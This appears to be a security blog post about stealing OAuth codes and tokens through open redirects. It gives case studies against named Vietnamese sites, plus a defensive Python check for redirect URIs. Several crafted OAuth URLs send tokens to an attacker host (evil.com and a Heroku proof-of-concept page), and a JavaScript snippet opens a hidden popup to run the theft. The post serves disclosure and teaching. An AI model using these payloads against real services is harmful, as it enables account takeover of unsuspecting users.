OAuth token theft using open redirect
OAuth is an authorization framework, commonly used as a single sign-on solution or as a convenient "login via Facebook account" button. Despite its "simplicity" and good documentation, you can still configure your system incorrectly.
A small mistake in the redirect_uri filter configuration will break OAuth2's secure flow. If yourwebsite.com allows redirect_uri to point to hackerwebsite.com, attackers can craft a URL, trick innocent, authorized users into visiting it, and then steal their session (codes/tokens). A common way to bypass redirect_uri filters is abusing an open redirect flaw.
Let's see how attackers can use this misconfiguration against some popular Vietnamese websites.
Case studies
Everything with the word peaceful in it is actual exploit code. Visit those URLs only if you know what you are doing.
Zalo OA
Let's consider Zalo Official Account. After logging in, I used Burp Suite to intercept its authorization process. Basically, it works as follows:
- Request http://oauth.zaloapp.com/v3/auth?app_id=[1]&redirect_uri=[2]?callback=[3]
- Check cookies, then append the uid and code parameters to the URL
- Authorize the user with [2]?callback=[3]&uid=[your-uid]&code=[your-auth-code]
- Redirect to [3] (open redirect)
So, by pointing [3] to the attacker's site and appending %23 (#), the flow becomes:
- Request http://oauth.zaloapp.com/v3/auth?app_id=[1]&redirect_uri=[2]?callback=http://evil.com%23
- Check cookies, then append the uid and code parameters to the URL
- Authorize the user with [2]?callback=http://evil.com/#&uid=[your-uid]&code=[your-auth-code]
- Then redirect to evil.com/#&uid=[your-uid]&code=[your-auth-code] (everything after # became a URL fragment)
- The attacker can "log in" with the stolen [your-uid] and [your-auth-code].
Reported: 04/08/2017
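The chain above relies on two checks failing: the provider's redirect_uri filter accepting anything that merely starts with the registered value, and the client site following an attacker-chosen callback. The following is an added example, not code from the post or from any site it names, showing the weak prefix check beside an exact-match check, plus a guard a client site can put in front of its own redirect/callback parameter. The host client.example and the registered URI are constructed.

```python
from urllib.parse import urlsplit

# Constructed allow-list for a hypothetical client app (not any site in the post).
# Registering complete URIs and comparing them as exact strings is what
# RFC 6749 section 3.1.2 and the OAuth 2.0 Security BCP recommend.
REGISTERED_REDIRECT_URIS = {"https://client.example/oauth/callback"}
CLIENT_HOST = "client.example"


def loose_redirect_uri_ok(uri: str) -> bool:
    """The weak filter the post describes: anything that starts with a registered
    value passes, so [2]?callback=[3] with an attacker-chosen [3] is accepted and
    the uid/code get forwarded to [3]."""
    return any(uri.startswith(r) for r in REGISTERED_REDIRECT_URIS)


def strict_redirect_uri_ok(uri: str) -> bool:
    """Authorization-server side: exact string match only, and never a URI that
    carries a '#', since a trailing fragment marker makes the browser drop
    whatever the server appends after it (the Zalo trick)."""
    return uri in REGISTERED_REDIRECT_URIS and "#" not in uri


def safe_local_target(target: str, allowed_host: str = CLIENT_HOST) -> bool:
    """Client-site side: guard for a 'redirect=' / 'callback=' parameter so the
    site cannot serve as the open-redirect hop. Only a local path or an absolute
    https URL on our own host is followed."""
    if "\\" in target:            # some browsers treat '\' like '/'
        return False
    parts = urlsplit(target)
    if parts.scheme == "" and parts.netloc == "":
        # plain path; '//evil.com' already parsed as a netloc above, so a single
        # leading slash is all that remains to require
        return target.startswith("/") and not target.startswith("//")
    if parts.scheme != "https":   # rejects http://, javascript:, data: ...
        return False
    return parts.netloc.lower() == allowed_host


if __name__ == "__main__":
    crafted = "https://client.example/oauth/callback?callback=http://evil.com%23"
    print("loose :", loose_redirect_uri_ok(crafted))    # True  (accepted)
    print("strict:", strict_redirect_uri_ok(crafted))   # False (rejected)
    print("hop   :", safe_local_target("http://evil.com%23"))  # False
```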
Lazada
Lazada allows users to log in using their Facebook accounts. Using a very professional, complex method commonly known as Googling, I found an open redirect flaw.
"lazada.vn" "redirect"
Easy enough: http://ho.lazada.vn/SHOYax?redirect=[target]. In this case, it is:
http://ho.lazada.vn/SHOYax?redirect=http://peaceful-basin-79118.herokuapp.com/LazadaPoC.html
Note that, instead of the traditional flow, Lazada uses a slightly modified variation, the HTML5 postMessage flow, with an outdated Facebook SDK: after a user authorizes Lazada with Facebook, the fbsr_[app_id] cookie is set to his/her signed_request. Still, this does not prevent attackers from using the traditional flow to create the payload:
https://www.facebook.com/v2.6/dialog/oauth?app_id=1503824746501801
&client_id=1503824746501801&display=popup&
&redirect_uri=http%3A%2F%2Fho.lazada.vn%2FSHOYax%3Fredirect%3Dhttp%3A%2F%2Fpeaceful-basin-79118.herokuapp.com%2FLazadaPoC.html%2F
&response_type=token%2Csigned_request
&scope=public_profile%2Cemail%2Cuser_birthday%2Cuser_friends&sdk=joey&version=v2.6
Reported: 04/08/2017
Viet ID
Looks like the redirect_uri is not filtered at all.
https://oauth.vietid.net/comment/login/enterPassword?cb=https%3A%2F%2Foauth.vietid.net%2Fcomment%2Fauthorize%3Fclient_id%3Dd9c694bd04eb35d96f1d71a84141d075%26response_type%3Dcode%26redirect_uri%3Dhttps%253A%252F%252Fpeaceful-basin-79118.herokuapp.com%252FGenericPoC.html%253Fapp_key%253Dd9c694bd04eb35d96f1d71a84141d075%2526clearsession%253D1%26state%3D281d2b8a029e5e351d1413178b1bc92a%26state_uri%3D
5giay and alike
OK, I somewhat cheated; it's not really an open redirect. The following URL asks for confirmation and automatically redirects to the target after 5 seconds if the user doesn't press any button.
www.5giay.vn/redirect.php?[target]
Using a small popup in the corner of the screen may be a good idea:
window.open('https://www.facebook.com/v2.4/dialog/oauth?client_id=525129800895046&scope=public_profile,' +
'email&state=[attacker_state]&redirect_uri=https%3A%2F%2Fwww.5giay.vn%2Fredirect.php' +
'%3Fhttp%253A%252F%252Fpeaceful-basin-79118.herokuapp.com%252FXenForo5giay.html%2523',
'_blank', 'toolbar=no,status=no,menubar=no,scrollbars=no,resizable=no,left=10000, top=10000, width=1, height=1, visible=none', '');
The state parameter just makes writing an automated exploit a little bit harder.
More interestingly, after dorking around, I found that a lot of forums like 5giay.vn out there seem vulnerable to this kind of 'attack' as well.
Phimmoi (Failed attempt)
Similar to the Lazada case (the victim might need to have his/her adblocker disabled):
Although Facebook accepts this as the redirect_uri, the redirection does not include anything after the & character (it is treated as a parameter), and the website only uses the code response type (&code=.....). Not exploitable.
Bonus
There are even more, but I have been too busy recently (*cough* paying for college *cough* *cough*) to test them all. These websites might make it into the list (hey, I have not tested them, so don't quote me):
- http://vtcmobile.vn/oauth (80% sure; quite ironic)
- https://go.vn/oauth
- https://vegaid.vn
This article is for educational purposes and customers' safety only.